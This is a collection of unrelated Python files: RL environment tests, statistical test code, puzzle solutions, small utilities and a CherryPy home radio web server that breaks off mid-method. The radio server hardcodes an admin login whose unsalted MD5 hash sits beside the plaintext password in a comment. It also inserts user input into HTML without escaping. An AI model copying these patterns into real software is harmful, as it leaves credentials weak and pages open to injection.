        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    stack_shape = (num_envs, frame_op_len * state_shape[0],) + state_shape[1:]
    assert state.shape == stack_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()


@pytest.mark.skip(reason='Not implemented yet')
@pytest.mark.parametrize('name,state_shape,reward_scale', [
    ('LunarLander-v2', (8,), None),
    ('CartPole-v0', (4,), None),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_stack(name, num_envs, state_shape, reward_scale):
    seed = 0
    frame_op = 'stack'  # used for rnn
    frame_op_len = 4
    venv = make_gym_venv(name, num_envs, seed, frame_op=frame_op, frame_op_len=frame_op_len, reward_scale=reward_scale)
    venv.reset()
    for i in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    stack_shape = (num_envs, frame_op_len,) + state_shape
    assert state.shape == stack_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()


@pytest.mark.parametrize('name,state_shape,image_downsize', [
    ('PongNoFrameskip-v4', (1, 84, 84), (84, 84)),
    ('PongNoFrameskip-v4', (1, 64, 64), (64, 64)),
])
@pytest.mark.parametrize('num_envs', (1, 4))
def test_make_gym_venv_downsize(name, num_envs, state_shape, image_downsize):
    seed = 0
    frame_op = None
    frame_op_len = None
    venv = make_gym_venv(name, num_envs, seed, frame_op=frame_op, frame_op_len=frame_op_len, image_downsize=image_downsize)
    venv.reset()
    for i in range(5):
        state, reward, done, info = venv.step([venv.action_space.sample()] * num_envs)

    assert isinstance(state, np.ndarray)
    assert state.shape == (num_envs,) + state_shape
    assert isinstance(reward, np.ndarray)
    assert reward.shape == (num_envs,)
    assert isinstance(done, np.ndarray)
    assert done.shape == (num_envs,)
    assert len(info) == num_envs
    venv.close()

"""Classification-based test and kernel two-sample test.

Author: Sandro Vega-Pons, Emanuele Olivetti.
"""

import os
import numpy as np
from sklearn.metrics import pairwise_distances, confusion_matrix
from sklearn.metrics import pairwise_kernels
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold, KFold, cross_val_score
from sklearn.grid_search import GridSearchCV
from kernel_two_sample_test import MMD2u, compute_null_distribution
from kernel_two_sample_test import compute_null_distribution_given_permutations
import matplotlib.pylab as plt
from joblib import Parallel, delayed


def compute_rbf_kernel_matrix(X):
    """Compute the RBF kernel matrix with sigma2 as the median pairwise
    distance.
    """
    sigma2 = np.median(pairwise_distances(X, metric='euclidean'))**2
    K = pairwise_kernels(X, X, metric='rbf', gamma=1.0/sigma2, n_jobs=-1)
    return K


def balanced_accuracy_scoring(clf, X, y):
    """Scoring function that computes the balanced accuracy to be used
    internally in the cross-validation procedure.
    """
    y_pred = clf.predict(X)
    conf_mat = confusion_matrix(y, y_pred)
    bal_acc = 0.
    for i in range(len(conf_mat)):
        bal_acc += (float(conf_mat[i, i])) / np.sum(conf_mat[i])

    bal_acc /= len(conf_mat)
    return bal_acc


def compute_svm_cv(K, y, C=100.0, n_folds=5,
                   scoring=balanced_accuracy_scoring):
    """Compute cross-validated score of SVM with given precomputed kernel.
    """
    cv = StratifiedKFold(y, n_folds=n_folds)
    clf = SVC(C=C, kernel='precomputed', class_weight='auto')
    scores = cross_val_score(clf, K, y,
                             scoring=scoring, cv=cv)
    return scores.mean()


def compute_svm_subjects(K, y, n_folds=5):
    """
    """
    cv = KFold(len(K)/2, n_folds)
    scores = np.zeros(n_folds)
    for i, (train, test) in enumerate(cv):
        train_ids = np.concatenate((train, len(K)/2+train))
        test_ids = np.concatenate((test, len(K)/2+test))
        clf = SVC(kernel='precomputed')
        clf.fit(K[train_ids, :][:, train_ids], y[train_ids])
        scores[i] = clf.score(K[test_ids, :][:, train_ids], y[test_ids])

    return scores.mean()


def permutation_subjects(y):
    """Permute class labels of Contextual Disorder dataset.
    """
    y_perm = np.random.randint(0, 2, len(y)/2)
    y_perm = np.concatenate((y_perm, np.logical_not(y_perm).astype(int)))
    return y_perm


def permutation_subjects_ktst(y):
    """Permute class labels of Contextual Disorder dataset for KTST.
    """
    yp = np.random.randint(0, 2, len(y)/2)
    yp = np.concatenate((yp, np.logical_not(yp).astype(int)))
    y_perm = np.arange(len(y))
    for i in range(len(y)/2):
        if yp[i] == 1:
            y_perm[i] = len(y)/2+i
            y_perm[len(y)/2+i] = i
    return y_perm


def compute_svm_score_nestedCV(K, y, n_folds,
                               scoring=balanced_accuracy_scoring,
                               random_state=None,
                               param_grid=[{'C': np.logspace(-5, 5, 25)}]):
    """Compute cross-validated score of SVM using precomputed kernel.
    """
    cv = StratifiedKFold(y, n_folds=n_folds, shuffle=True,
                         random_state=random_state)
    scores = np.zeros(n_folds)
    for i, (train, test) in enumerate(cv):
        cvclf = SVC(kernel='precomputed')
        y_train = y[train]
        cvcv = StratifiedKFold(y_train, n_folds=n_folds,
                               shuffle=True,
                               random_state=random_state)
        clf = GridSearchCV(cvclf, param_grid=param_grid, scoring=scoring,
                           cv=cvcv, n_jobs=1)
        clf.fit(K[train, :][:, train], y_train)
        # print clf.best_params_
        scores[i] = clf.score(K[test, :][:, train], y[test])

    return scores.mean()


def apply_svm(K, y, n_folds=5, iterations=10000, subjects=False, verbose=True,
              random_state=None):
    """
    Compute the balanced accuracy, its null distribution and the p-value.

    Parameters:
    ----------
    K: array-like
        Kernel matrix
    y: array_like
        class labels
    cv: Number of folds in the stratified cross-validation
    verbose: bool
        Verbosity

    Returns:
    -------
    acc: float
        Average balanced accuracy.
    acc_null: array
        Null distribution of the balanced accuracy.
    p_value: float
         p-value
    """
    # Computing the accuracy
    param_grid = [{'C': np.logspace(-5, 5, 20)}]
    if subjects:
        acc = compute_svm_subjects(K, y, n_folds)
    else:
        acc = compute_svm_score_nestedCV(K, y, n_folds, param_grid=param_grid,
                                         random_state=random_state)
    if verbose:
        print("Mean balanced accuracy = %s" % (acc))
        print("Computing the null-distribution.")

    # Computing the null-distribution

    # acc_null = np.zeros(iterations)
    # for i in range(iterations):
    #     if verbose and (i % 1000) == 0:
    #         print(i),
    #         stdout.flush()

    #     y_perm = np.random.permutation(y)
    #     acc_null[i] = compute_svm_score_nestedCV(K, y_perm, n_folds,
    #                                              param_grid=param_grid)

    # if verbose:
    #     print ''

    # Computing the null-distribution
    if subjects:
        yis = [permutation_subjects(y) for i in range(iterations)]
        acc_null = Parallel(n_jobs=-1)(delayed(compute_svm_subjects)(K, yis[i], n_folds) for i in range(iterations))
    else:
        yis = [np.random.permutation(y) for i in range(iterations)]
        acc_null = Parallel(n_jobs=-1)(delayed(compute_svm_score_nestedCV)(K, yis[i], n_folds, scoring=balanced_accuracy_scoring, param_grid=param_grid) for i in range(iterations))
    # acc_null = Parallel(n_jobs=-1)(delayed(compute_svm_cv)(K, yis[i], C=100., n_folds=n_folds) for i in range(iterations))

    p_value = max(1.0 / iterations, (acc_null > acc).sum()
                  / float(iterations))
    if verbose:
        print("p-value ~= %s \t (resolution : %s)" % (p_value, 1.0/iterations))

    return acc, acc_null, p_value


def apply_ktst(K, y, iterations=10000, subjects=False, verbose=True):
    """
    Compute MMD^2_u, its null distribution and the p-value of the
    kernel two-sample test.

    Parameters:
    ----------
    K: array-like
        Kernel matrix
    y: array_like
        class labels
    verbose: bool
        Verbosity

    Returns:
    -------
    mmd2u: float
        MMD^2_u value.
    acc_null: array
        Null distribution of the MMD^2_u
    p_value: float
         p-value
    """
    assert len(np.unique(y)) == 2, 'KTST only works on binary problems'

    # Assuming that the first m rows of the kernel matrix are from one
    # class and the other n rows from the second class.
    m = len(y[y == 0])
    n = len(y[y == 1])
    mmd2u = MMD2u(K, m, n)
    if verbose:
        print("MMD^2_u = %s" % mmd2u)
        print("Computing the null distribution.")
    if subjects:
        perms = [permutation_subjects_ktst(y) for i in range(iterations)]
        mmd2u_null = compute_null_distribution_given_permutations(K, m, n,
                                                                  perms,
                                                                  iterations)
    else:
        mmd2u_null = compute_null_distribution(K, m, n, iterations,
                                               verbose=verbose)

    p_value = max(1.0/iterations, (mmd2u_null > mmd2u).sum()
                  / float(iterations))
    if verbose:
        print("p-value ~= %s \t (resolution : %s)" % (p_value, 1.0/iterations))

    return mmd2u, mmd2u_null, p_value


def plot_null_distribution(stats, stats_null, p_value, data_name='',
                           stats_name='$MMD^2_u$', save_figure=True):
    """Plot the observed value for the test statistic, its null
    distribution and p-value.
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    prob, bins, patches = plt.hist(stats_null, bins=50, normed=True)
    ax.plot(stats, prob.max()/30, 'w*', markersize=15,
            markeredgecolor='k', markeredgewidth=2,
            label="%s = %s" % (stats_name, stats))

    ax.annotate('p-value: %s' % (p_value),
                xy=(float(stats), prob.max()/9.),  xycoords='data',
                xytext=(-105, 30), textcoords='offset points',
                bbox=dict(boxstyle="round", fc="1."),
                arrowprops={"arrowstyle": "->",
                            "connectionstyle": "angle,angleA=0,angleB=90,rad=10"},
                )
    plt.xlabel(stats_name)
    plt.ylabel('p(%s)' % stats_name)
    plt.legend(numpoints=1)
    plt.title('Data: %s' % data_name)

    if save_figure:
        save_dir = 'figures'
        if not os.path.exists(save_dir):
            os.makedirs(save_dir)

        stn = 'ktst' if stats_name == '$MMD^2_u$' else 'clf'
        fig_name = os.path.join(save_dir, '%s_%s.pdf' % (data_name, stn))
        fig.savefig(fig_name)

from collections import namedtuple

Resolution = namedtuple('Resolution', ['x', 'y'])
class Resolutions(object):
    resolutions = [
        (1920, 1200),
        (1920, 1080),
        (1680, 1050),
        (1440, 900),
        (1360, 768),
        (1280, 800),
        (1024, 640)
    ]

    @classmethod
    def parse(self, x, y):
        if (x,y) not in self.resolutions:
            resolutions = ', '.join(['%sx%s' % (a, b) for a,b in self.resolutions])
            raise Exception('Resolution %s x %s not supported. Available resolutions: %s' % (x,y, resolutions)  )
        return Resolution(x, y)

class Color(object):
    gray =        (0.15, 0.15,   0.13,   1.0)
    black =       (0.0, 0.0, 0.0, 1.0)
    white =       (1.0, 1.0, 1.0, 1.0)
    red =         (1.0, 0.2, 0.0, 1.0)
    orange =      (1.0, 0.4, 0.0, 1.0)
    yellow =      (1.0, 0.9, 0.0, 1.0)
    light_green = (0.4, 1.0, 0.0, 1.0)
    green =       (0.0, 1.0, 0.2, 1.0)
    cyan =        (0.0, 1.0, 0.4, 1.0)
    light_blue =  (0.0, 0.6, 1.0, 1.0)
    blue =        (0.0, 0.2, 1.0, 1.0)
    purple =      (0.4, 0.0, 1.0, 1.0)
    pink =        (1.0, 0.0, 0.8, 1.0)
    @classmethod
    def __colors(self):
        return [key for key in self.__dict__.keys() if not key.startswith('_') and key != 'named']
    @classmethod
    def named(self, name):
        if not hasattr(self, name):
            colors = ', '.join(self.__colors())
            raise Exception('Unknown color %s. Available colors are: %s' % (name, colors))
        return getattr(self, name)

def try_parse(value):
    try:    return int(value)
    except: return { 'true': True, 'false': False }.get(value.lower(), value)

def read_config():
    with open('config.cfg', 'r') as cfg_file:
        lines = cfg_file.readlines()
        lines = [
            line.strip().replace(' ', '').split('=')
            for line in lines
            if line.strip() and '=' in line
        ]
        cfg = {key:try_parse(value) for key,value in lines}
        return cfg

cfg = read_config()

NUM_CELLS = cfg.get('CELLS', 100)
RESOLUTION = Resolutions.parse(cfg.get('WINDOW_WIDTH', 1280), cfg.get('WINDOW_HEIGHT', 800))
limit = min(RESOLUTION)
PIXEL_PER_CELL = limit / NUM_CELLS
OFFSET_X = (RESOLUTION.x - (NUM_CELLS * PIXEL_PER_CELL)) / 2
OFFSET_Y = (RESOLUTION.y - (NUM_CELLS * PIXEL_PER_CELL)) / 2

SHOW_FULLSCREEN = cfg.get('FULLSCREEN', False)
SHOW_GRID = cfg.get('SHOW_GRID', True)
BACKGROUND_COLOR = Color.named(cfg.get('BACKGROUND_COLOR', 'black'))
GRID_BACKDROP_COLOR = Color.named(cfg.get('GRID_BACKDROP_COLOR', 'gray'))
GRID_LINE_COLOR = Color.named(cfg.get('GRID_LINE_COLOR', 'black'))
CELL_COLOR = Color.named(cfg.get('CELL_COLOR', 'green'))
CURSOR_COLOR = Color.named(cfg.get('CURSOR_COLOR', 'red'))

# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
#   spec/fixtures/responses/whois.nic.pw/status_available
#
# and regenerate the tests with the following script
#
#   $ scripts/generate_tests.py
#

from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois

class TestWhoisNicPwStatusAvailable(object):

    def setUp(self):
        fixture_path = "spec/fixtures/responses/whois.nic.pw/status_available.txt"
        host         = "whois.nic.pw"
        part         = yawhois.record.Part(open(fixture_path, "r").read(), host)
        self.record  = yawhois.record.Record(None, [part])

    def test_status(self):
        eq_(self.record.status, [])

    def test_available(self):
        eq_(self.record.available, True)

    def test_domain(self):
        eq_(self.record.domain, None)

    def test_nameservers(self):
        eq_(self.record.nameservers.__class__.__name__, 'list')
        eq_(self.record.nameservers, [])

    def test_admin_contacts(self):
        eq_(self.record.admin_contacts.__class__.__name__, 'list')
        eq_(self.record.admin_contacts, [])

    def test_registered(self):
        eq_(self.record.registered, False)

    def test_created_on(self):
        eq_(self.record.created_on, None)

    def test_registrar(self):
        eq_(self.record.registrar, None)

    def test_registrant_contacts(self):
        eq_(self.record.registrant_contacts.__class__.__name__, 'list')
        eq_(self.record.registrant_contacts, [])

    def test_technical_contacts(self):
        eq_(self.record.technical_contacts.__class__.__name__, 'list')
        eq_(self.record.technical_contacts, [])

    def test_updated_on(self):
        eq_(self.record.updated_on, None)

    def test_domain_id(self):
        eq_(self.record.domain_id, None)

    def test_expires_on(self):
        eq_(self.record.expires_on, None)

    def test_disclaimer(self):
        eq_(self.record.disclaimer, None)

class Solution(object):
    def missingNumber(self, nums):
        """
        :type nums: List[int]
        :rtype: int
        """
        xor = len(nums)

        for i, n in enumerate(nums):
            xor ^= n
            xor ^= i

        return xor

inputs = [
    [0],
    [1],
    [3,0,1],
    [9,6,4,2,3,5,7,0,1]
]

s = Solution()
for i in inputs:
    print s.missingNumber(i)

import _plotly_utils.basevalidators


class MinexponentValidator(_plotly_utils.basevalidators.NumberValidator):
    def __init__(
        self, plotly_name="minexponent", parent_name="choropleth.colorbar", **kwargs
    ):
        super(MinexponentValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "colorbars"),
            min=kwargs.pop("min", 0),
            **kwargs
        )

import urllib
import urllib2
from bs4 import BeautifulSoup

textToSearch = 'gorillaz'
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html)
for vid in soup.findAll(attrs={'class':'yt-uix-tile-link'}):
        print 'https://www.youtube.com' + vid['href']


########################################
# Automatically generated, do not edit.
########################################


from pyvisdk.thirdparty import Enum

DatastoreSummaryMaintenanceModeState = Enum(
    'enteringMaintenance',
    'inMaintenance',
    'normal',

)

from math import floor


def score_syntax_errors(program_lines):
    points = {')': 3, ']': 57, '}': 1197, '>': 25137}
    s = 0
    scores_auto = []

    for line in program_lines:
        corrupted, stack = corrupted_character(line)

        if corrupted:
            s += points[corrupted]
        else:
            scores_auto.append(score_autocomplete(stack))

    return s, sorted(scores_auto)[floor(len(scores_auto)/2)]


def corrupted_character(inp):
    stack = []
    lookup = {'(': ')', '[': ']', '{': '}', '<': '>'}
    lookup_close = {v: k for k, v in lookup.items()}

    def stack_converter(st):
        return [lookup[element] for element in st[::-1]]

    for char in inp:
        if char in lookup:
            stack.append(char)
        elif char in lookup_close:
            expected = stack.pop()

            if expected != lookup_close[char]:
                return char, stack_converter(stack)
        else:
            print(f"INVALID {char}")

    return None, stack_converter(stack)


def score_autocomplete(stack):
    points_autocomplete = {')': 1, ']': 2, '}': 3, '>': 4}
    s_auto = 0

    for char in stack:
        s_auto *= 5
        s_auto += points_autocomplete[char]

    return s_auto


def test_corrupted_character():
    assert corrupted_character('{([(<{}[<>[]}>{[]{[(<()>')[0] == '}'
    assert corrupted_character('[[<[([]))<([[{}[[()]]]')[0] == ')'
    assert corrupted_character('[{[{({}]{}}([{[{{{}}([]')[0] == ']'
    assert corrupted_character('[<(<(<(<{}))><([]([]()')[0] == ')'
    assert corrupted_character('<{([([[(<>()){}]>(<<{{')[0] == '>'


def test_score_syntax_errors():
    assert score_syntax_errors(open('input/10.test').read().splitlines()) == (26397, 288957)


def test_corrupted_character_stack():
    assert corrupted_character('[({(<(())[]>[[{[]{<()<>>')[1] == ['}', '}', ']', ']', ')', '}', ')', ']']


def test_scoring_autocomplete():
    assert score_autocomplete('}}]])})]') == 288957
    assert score_autocomplete(')}>]})') == 5566
    assert score_autocomplete('}}>}>))))') == 1480781


if __name__ == '__main__':
    print(score_syntax_errors(open('input/10').read().splitlines()))

#!/usr/bin/python

#
# Config file test app (together with test.cfg file)
#

import os, sys

sys.path.append("..")

import configfile

cfg = configfile.ConfigFile("test.cfg")

cfg.setCfgValue("name1", "value1")
cfg.setCfgValue("name2", "value2")
cfg.selectSection("user")
cfg.setCfgValue("username", "janis")
cfg.setCfgValue("acceptable_names", ["john", "janis"])
cfg.load()

print cfg.cfg.options("main")
print cfg.cfg.options("user")
print cfg.getCfgValue("username")
print type(cfg.getCfgValue("username"))
print cfg.getCfgValueAsList("acceptable_names")
print cfg.getCfgValueAsList("list_in_list")
cfg.selectSection("main")
print cfg.getCfgValueAsInt("a_number")
print type(cfg.getCfgValueAsInt("a_number"))
print cfg.getCfgValueAsBool("a_bool")
print type(cfg.getCfgValueAsBool("a_bool"))

cfg.filename = "test-mod.cfg"
cfg.selectSection("main")
cfg.setCfgValue("name1", "value1mod2")
cfg.setCfgValue("a_number", 14)
cfg.selectSection("user")
cfg.setCfgValue("acceptable_names", ["john", "janis", "ivan"])
cfg.setCfgValue("list_in_list2", ["[baz]", "[foo, bar]"])
cfg.setCfgValue("list_in_list3", ["first", "[second-one, second-third]"])
cfg.save()

#!/usr/bin/env python3
"""
  My radio server application
  For my eyes only
"""

#CREATE TABLE Radio(id integer primary key autoincrement, radio text, genre text, url text);
uuid='56ty66ba-6kld-9opb-ak29-0t7f5d294686'

# Import CherryPy global namespace
import os
import sys
import time
import socket
import cherrypy
import sqlite3 as lite
import re
import subprocess
from random import shuffle

# Globals
version = "4.2.1"
database = "database.db"
player = 'omxplayer'

header = '''<!DOCTYPE html>
<html lang="en">
<head>
  <title>My Radio Web Server</title>
  <meta name="generator" content="Vim">
  <meta charset="UTF-8">
  <link rel="icon" type="image/png" href="/static/css/icon.png" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="/static/js/jquery-2.0.3.min.js"></script>
  <script src="/static/js/bootstrap.min.js"></script>
  <link rel="stylesheet" href="/static/css/bootstrap.min.css">

<!-- Custom styles for this template -->
<link href="/static/css/sticky-footer.css" rel="stylesheet">
<style media="screen" type="text/css">
#radio-playing { display: none; }
#radio-table  { display: none; }
#radio-volume { display: none; }
.jumbotron { padding: 10px 10px; }
</style>

<script type="text/javascript">
     function fmodradio(rid) {
        $.post('/m/', {id: rid},
            function(data){
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }
     function fdelradio(rid) {
       var r = confirm("DELETING " + rid);
       if (r != true) { return; }
       $.post('/d/', {id: rid},
            function(data){
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }
     function fplayradio(rid) {
        $.post('/p/', {id: rid},
            function(data){
                $("#radio-playing").html(data);
                $("#radio-playing").show();
                $("#radio-volume").hide();
            },
            "html"
        );
     }
     function faddfav(i, g) {
       $.post('/haddfav/', {id: i},
            function(data){
                $("#radio-playing").html(data);
                $("#radio-playing").show();
                $("#radio-volume").hide();
            },
            "html"
        );
     }
     function fvolradio(updown) {
        $.post('/v/', {vol: updown},
            function(data){
                $("#radio-volume").html(data);
                $("#radio-volume").show();
            },
            "html"
        );
     }
     function fkilradio() {
        $.post('/k/',
            function(data){
                $("#radio-volume").html(data);
                $("#radio-volume").show();
            },
            "html"
        );
     }
     function fsearch(nam, gen) {
        $.post('/g/', {name: nam, genre: gen},
            function(data) {
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }
     function frandom(n, g) {
       $.post('/g/', {name: n, genre: g, randomlist:'true'},
            function(data){
                $("#radio-table").html(data);
                $("#radio-table").show();
            },
            "html"
        );
     }

// ----------------------------------------------------------
     $(document).ready(function() {
         $('body').on('click', '#button-modify', function(e) {
             i = $("#idm").val()
             n = $("#namem").val()
             g = $("#genrem").val()
             u = $("#urlm").val()
             $.post("/f/", {id: i, name: n, genre: g, url: u})
              .done(function(data) {
                $("#radio-table").html(data);
                $("#radio-table").show();
            });
            e.preventDefault();
         });
         $('#namem').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-modify').click();
            }
         });
         $('#genrem').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-modify').click();
            }
         });
         $('#urlm').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-modify').click();
            }
         });
         $('#button-search').click(function(e) {
             n = $("#name").val()
             g = $("#genre").val()
             $.post("/g/", {name: n, genre: g})
              .done(function(data) {
                  $("#radio-table").html(data);
                  $("#radio-table").show();
            });
            e.preventDefault();
         });
         $('#name').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-search').click();
            }
         });
         $('#genre').keyup(function(e){
            if(e.keyCode == 13) {
                $('#button-search').click();
            }
         });
         $("#button-insert").click(function(e) {
             n = $("#namei").val()
             g = $("#genrei").val()
             u = $("#urli").val()
             $.post("/i/", {name: n, genre: g, url: u})
              .done(function(data) {
                  $("#radio-table").html(data);
                  $("#radio-table").show();
            });
            e.preventDefault();
         });
         $("#play-radio").click(function(e) {
             i = $("#idp").val()
             $.post("/p/", {id: i})
              .done(function(data) {
                  $("#radio-playing").html(data);
                  $("#radio-playing").show();
            });
            e.preventDefault();
         });
       });
     </script>
</head>
<body>

<div class="container-fluid">
   <div class='jumbotron'>
      <h2><a href="/">Radio</a>
      <a href="#" onClick="fvolradio('down')"><span class="glyphicon glyphicon-volume-down"></span></a>
      <a href="#" onClick="fvolradio('up')"><span class="glyphicon glyphicon-volume-up"></span></a>
      <a href="#" onClick="fkilradio('up')"> <span class="glyphicon glyphicon-record"></span></a>
      </h2>
      <p>
      <div class="form-group">
        <input type="text" id="name" name="name" placeholder="radio to search">
        <input type="text" id="genre" name="genre" placeholder="genre" >
        <button id="button-search">Search</button>
      </div>
      </p>
      <p>
      <div class="form-group">
      <input type="text" id="namei" name="name" placeholder="Radio Name">
       <input type="text" id="genrei" name="genre" placeholder="genre">
        <input type="text" id="urli" name="url" placeholder="http://radio.com/stream.mp3">
       <button id="button-insert">Insert</button>
       <p>
      [
      <a href="#" onClick="fsearch('', 'rai')"> rai </a>|
      <a href="#" onClick="fsearch('','fav')"> fav </a> |
      <a href="#" onClick="fsearch('','rmc')"> rmc </a> |
      <a href="#" onClick="fsearch('','class')"> class </a> |
      <a href="#" onClick="fsearch('','jazz')"> jazz </a> |
      <a href="#" onClick="fsearch('','chill')"> chill </a> |
      <a href="#" onClick="fsearch('','nl')"> nl </a> |
      <a href="#" onClick="fsearch('','bbc')"> bbc </a> |
      <a href="#" onClick="fsearch('','uk')"> uk </a> |
      <a href="#" onClick="fsearch('','italy')"> italy </a>
      ]
      </p>
      </div>
    <small><div id="radio-playing"> </div></small>
    </br>
   </div> <!-- Jumbotron END -->

 <div id="radio-volume"> </div>
 <div id="radio-table"> </div>
'''

footer = '''<p></div></body></html>'''

def isplayfile(pathname) :
    if os.path.isfile(pathname) == False:
        return False
    ext = os.path.splitext(pathname)[1]
    ext = ext.lower()
    if (ext == '.mp2') : return True;
    if (ext == '.mp3') : return True;
    if (ext == '.ogg') : return True;
    return False

# ------------------------ AUTHENTICATION --------------------------------
from cherrypy.lib import auth_basic

#  Password is: webradio
users = {'admin':'29778a9bdb2253dd8650a13b8e685159'}

def validate_password(self, login, password):
    if login in users :
        if encrypt(password) == users[login] :
            cherrypy.session['username'] = login
            cherrypy.session['database'] = userdatabase(login)
            return True

    return False

def encrypt(pw):
    from hashlib import md5
    return md5(pw).hexdigest()

# ------------------------ CLASS --------------------------------
class Root:
    @cherrypy.expose
    def index(self):
        html = header
        (_1, _2, id) = getradio('0')
        (radio, genre, url) = getradio(id)

        if id != 0:
            html += '''<h3><a href="#" onClick="fplayradio('%s')"> ''' % id
            html += '''Play Last Radio %s <span class="glyphicon glyphicon-play"></span></a></h3>''' % radio
        html += getfooter()
        return html

    @cherrypy.expose
    def music(self, directory='/mnt/Media/Music/'):
        html = header
        count = 0
        html += '''<table class="table table-condensed">'''
        filelist = os.listdir(directory)
        filelist.sort()
        for f in filelist:
          file = os.path.join(directory, f)
          html += '''<tr>'''
          if isplayfile(file):
            html += '''<td ><a href="#" onClick="fplayradio('%s')">''' % file
            html += '''Play %s<span class="glyphicon glyphicon-play"></span></a></td>''' % (file)
          if os.path.isdir(file):
            html += '''<td ><a href="/music?directory=%s">%s</a> </td>''' % (file, f)
          html += '''</tr>'''
          count += 1

        html += '''</table>'''
        html += '''</div> </div>'''

        html += getfooter()
        return html

    @cherrypy.expose
    def g(self, name="", genre="", randomlist='false'):
        list = searchradio(name.decode('utf8'), genre)
        count = 0

        # Randomlist
        if randomlist == 'true' : shuffle(list)

        listhtml = '''<table class="table table-condensed">'''
        for id,radio,gen,url in list:
            listhtml += '''<tr>'''
            listhtml += '''<td width="200px"><a href="#" onClick="fmodradio('%s')" alt="%s">%s</a></td>''' % (id, url, radio)
            listhtml += '''<td width="100px">%s</td>''' % gen
            listhtml += '''<td ><a href="#" onClick="fplayradio('%s')">Play <span class="glyphicon glyphicon-play"></span></a></td>''' % (id)
            listhtml += '''</tr>'''
            count += 1
        listhtml += '''</table>'''
        listhtml += '''</div> </div>'''

        html = ''
        html += '''<div class="row"> <div class="col-md-8"> '''
        if randomlist == 'false':
            html += '''<h2><a href="#" onClick="frandom(name='%s', genre='%s', randomlist='true')">%d Results for '%s' + '%s'</a></h2>''' % (name, genre, count, name, genre)
        else:
            html += '''<h2><a href="#" onClick="fsearch(name='%s', genre='%s')">%d Random for '%s' + '%s'</a></h2>''' % (name, genre, count, name, genre)

        html += listhtml

        return html

    @cherrypy.expose
    def i(self, name="", genre="", url=""):
        html = "<h2>Insert</h2>"
        if name == "" or name == None :
          html += "Error no name"
          return html

        if insert(name, genre, url) == False:
            html += "Error db "
            return html

        html += '''<h3>This radio has been inserted</h3>'''
        html += '''<p><table class="table table-condensed">'''
        html += ''' <tr> '''
        html += '''  <td>radio: <strong>%s</strong></td> ''' % name
        html += '''  <td>genre: <strong>%s</strong></td> ''' % genre
        html += '''  <td>url: <strong><a href="%s" target="_blank">%s</a></strong></td> ''' % (url, url)
        html += '''  <td width="300px"><a href="#" onClick="fplayradio('%s')"> Play ''' % url
        html += '''<span class="glyphicon glyphicon-play"></span></a></td>'''
        html += ''' </tr> '''
        html += '''</table>'''

        return html

    @cherrypy.expose
    def d(self, id=""):
        html = "<h2>Delete</h2>"
        if id == "" or id == None :
            html += "Error"
            return html

        if id == "0" :
          html += "0 is reserved, sorry"
          return html

        #if delete(id) == False:
        if nonexist(id) == False:
            html += "Delete error in id" % id
            html += getfooter()
            return html

        html += "Item %s set as non existent" % id
        return html

    @cherrypy.expose
    def p(self, id):
        html = ""
        if id == "" or id == None :
            html += "Error no radio id"
            return html
        if id == "0" :
          html += "0 is reserved, sorry"
          return html

        (radio, genre, url) = playradio(id)
        if  url == '':
            html += "Error in parameter %s" % url
            return html

        cherrypy.session['playing'] = id
        html += '''<h3>Now Playing: '''
        html += '''<a href="%s">%s</a>''' % (url, radio)
        html += '''<a href="#" onClick="fplayradio('%s')">''' % id
        html += '''<span class="glyphicon glyphicon-play"></span></a>'''
        html += '''&nbsp;<a href="#" onClick="fmodradio('%s')"><span class="glyphicon glyphicon-pencil"></span></a></small>&nbsp;''' % id
        html += '''<a href="#" onClick="fdelradio('%s')"><span class="glyphicon glyphicon-trash"></span></a>&nbsp;''' % id
        html += '''<a href="#" onClick="faddfav('%s')"><span class="glyphicon glyphicon-star"></span></a>''' % id
        html += '''</h3>'''
        return html

    @cherrypy.expose
    def v(self, vol=""):
        html = ""
        if vol == "" or vol == None :
           html += "Error"
        v = volume(vol)

        html += "<h6>%s (%s) </h6>" % (v, vol)
        return html

    @cherrypy.expose
    def m(self, id):
        html = '''<h2>Modify</h2>'''

        if id == "" or id == None :
          html += "Error"
          return html
        if id == "0" :
          html += "0 is reserved, sorry"
          return html

        (name, genre, url) = getradio(id)
        html += '<h3>%s | %s | %s</h3>' % (name, genre, url)
        html += '''<input type="hidden" id="idm" name="id" value="%s">''' % id
        html += '''<input type="text" id="namem" name="name" value="%s">''' % name
        html += '''genre: <input type="text" id="genrem" name="genre" value="%s"> ''' % genre
        html += '''url: <input type="text" style="min-width: 280px" id="urlm" name="url" value="%s"> ''' % url
        html += '''<button id="button-modify">Change</button>'''
        html += '''<h3><a href="#" onClick="fdelradio('%s')">Delete? <span class="glyphicon glyphicon-trash"></span></a></h3>''' % id
        html += '''<h3><a href="%s" target="_blank">Play in browser <span class="glyphicon glyphicon-music"></span></a>''' % url


        return html

    @cherrypy.expose
    def f(self, id="", name="", genre="", url=""):
        html = '''<h2>Modified</h2>'''
        if id == "" or id == None :
          html += "Error missing id"
          return html

        if id == "0" :
          html += "0 is reserved, sorry"
          return html

        if modify(id, name, url, genre) == False:
            html += "Error in DB"
            return html

        (name, genre, url) = getradio(id)
